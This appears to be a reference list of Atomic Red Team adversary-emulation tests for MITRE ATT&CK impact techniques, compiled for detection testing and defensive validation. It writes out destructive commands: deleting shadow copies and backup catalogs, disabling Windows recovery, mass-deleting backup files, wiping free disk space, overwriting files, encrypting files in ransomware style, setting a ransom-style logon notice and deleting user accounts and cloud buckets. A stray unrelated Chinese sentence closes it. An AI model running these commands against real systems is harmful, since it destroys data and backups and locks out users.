T1531

Account Access Removal

T1529

System Shutdown/Reboot

T1496

Resource Hijacking

T1491.001

Defacement: Internal Defacement

T1490

Inhibit System Recovery

T1489

Service Stop

T1486

Data Encrypted for Impact

T1485

Data Destruction

T1531

Account Access Removal

• Atomic Test #1 - Change User Password - Windows
• Atomic Test #2 - Delete User - Windows
• Atomic Test #3 - Remove Account From Domain Admin Group
• Atomic Test #4 - Change User Password via passwd
• Atomic Test #5 - Delete User via dscl utility
• Atomic Test #6 - Delete User via sysadminctl utility
• Atomic Test #7 - Azure AD - Delete user via Azure AD PowerShell
• Atomic Test #8 - Azure AD - Delete user via Azure CLI

Change User Password - Windows

net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}

Delete User - Windows

net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /delete

Remove Account From Domain Admin Group

$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
  Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
    write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}

Change User Password via passwd

passwd #{user_account} #enter admin password > enter new password > confirm new password

Delete User via dscl utility

dscl . -delete /Users/#{user_account} #enter admin password

Delete User via sysadminctl utility

sysadminctl -deleteUser #{user_account} #enter admin password

Azure AD - Delete user via Azure AD PowerShell

Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalname

Azure AD - Delete user via Azure CLI

az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalname

T1529

System Shutdown/Reboot

• Atomic Test #1 - Shutdown System - Windows
• Atomic Test #2 - Restart System - Windows
• Atomic Test #3 - Restart System via shutdown
• Atomic Test #4 - Shutdown System via shutdown
• Atomic Test #5 - Restart System via reboot
• Atomic Test #6 - Shutdown System via halt
• Atomic Test #7 - Reboot System via halt
• Atomic Test #8 - Shutdown System via poweroff
• Atomic Test #9 - Reboot System via poweroff
• Atomic Test #10 - Logoff System - Windows

Shutdown System - Windows

shutdown /s /t #{timeout}

Restart System - Windows

shutdown /r /t #{timeout}

Restart System via shutdown - macOS/Linux

shutdown -r #{timeout}

Shutdown System via shutdown - macOS/Linux

shutdown -h #{timeout}

Restart System via reboot - macOS/Linux

reboot

Shutdown System via halt - Linux

halt -p

Reboot System via halt - Linux

halt --reboot

Shutdown System via poweroff - Linux

poweroff

Reboot System via poweroff - Linux

poweroff --reboot

Logoff System - Windows

shutdown /l

T1496

Resource Hijacking

• Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes

macOS/Linux - Simulate CPU Load with Yes

yes > /dev/null

T1491.001

Defacement: Internal Defacement

• Atomic Test #1 - Replace Desktop Wallpaper
• Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

Replace Desktop Wallpaper

$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @' 
using System.Runtime.InteropServices; 
namespace Win32{

    public class Wallpaper{ 
        [DllImport("user32.dll", CharSet=CharSet.Auto)] 
         static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
         
         public static void SetWallpaper(string thePath){ 
            SystemParametersInfo(20,0,thePath,3); 
        }
    }
} 
'@
$wc = New-Object System.Net.WebClient  
try{  
    $wc.DownloadFile($url, $imgLocation)
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
catch [System.Net.WebException]{  
    Write-Host("Cannot download $url") 
    add-type $updateWallpapercode 
    [Win32.Wallpaper]::SetWallpaper($imgLocation)
} 
finally{    
    $wc.Dispose()  
}

Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message

$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force

T1490

Inhibit System Recovery

• Atomic Test #1 - Windows - Delete Volume Shadow Copies
• Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
• Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog
• Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
• Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
• Atomic Test #6 - Windows - Delete Backup Files
• Atomic Test #7 - Windows - wbadmin Delete systemstatebackup
• Atomic Test #8 - Windows - Disable the SR scheduled task
• Atomic Test #9 - Disable System Restore Through Registry

Windows - Delete Volume Shadow Copies

vssadmin.exe delete shadows /all /quiet

Windows - Delete Volume Shadow Copies via WMI

wmic.exe shadowcopy delete

Windows - wbadmin Delete Windows Backup Catalog

wbadmin delete catalog -quiet

Windows - Disable Windows Recovery Console Repair

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no

Windows - Delete Volume Shadow Copies via WMI with PowerShell

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

Windows - Delete Backup Files

del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk

Windows - wbadmin Delete systemstatebackup

wbadmin delete systemstatebackup -keepVersions:0

Windows - Disable the SR scheduled task

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

Disable System Restore Through Registry

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f

T1489

Service Stop

• Atomic Test #1 - Windows - Stop service using Service Controller
• Atomic Test #2 - Windows - Stop service using net.exe
• Atomic Test #3 - Windows - Stop service by killing process

Windows - Stop service using Service Controller

sc.exe stop #{service_name}

Windows - Stop service using net.exe

net.exe stop #{service_name}

Windows - Stop service by killing process

taskkill.exe /f /im #{process_name}

T1486

Data Encrypted for Impact

• Atomic Test #1 - Encrypt files using gpg (Linux)
• Atomic Test #2 - Encrypt files using 7z (Linux)
• Atomic Test #3 - Encrypt files using ccrypt (Linux)
• Atomic Test #4 - Encrypt files using openssl (Linux)
• Atomic Test #5 - PureLocker Ransom Note
• Atomic Test #6 - Encrypt files using 7z utility - macOS
• Atomic Test #7 - Encrypt files using openssl utility - macOS
• Atomic Test #8 - Data Encrypted with GPG4Win

Encrypt files using gpg (Linux)

echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}

Encrypt files using 7z (Linux)

$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}

Encrypt files using ccrypt (Linux)

if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi

Encrypt files using openssl (Linux)

$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}

PureLocker Ransom Note

echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt

Encrypt files using 7z utility - macOS

7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}

Encrypt files using openssl utility - macOS

openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}

Data Encrypted with GPG4Win

cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'

T1485

Data Destruction

• Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
• Atomic Test #2 - macOS/Linux - Overwrite file with DD
• Atomic Test #3 - Overwrite deleted data on C drive
• Atomic Test #4 - GCP - Delete Bucket

Windows - Overwrite file with Sysinternals SDelete

if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"

macOS/Linux - Overwrite file with DD

dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes

Overwrite deleted data on C drive

cipher.exe /w:C:

GCP - Delete Bucket

gcloud config set project #{project_id}
gcloud storage buckets delete gs://#{bucket_name}

迷茫的人生，需要不断努力，才能看清远方模糊的志向！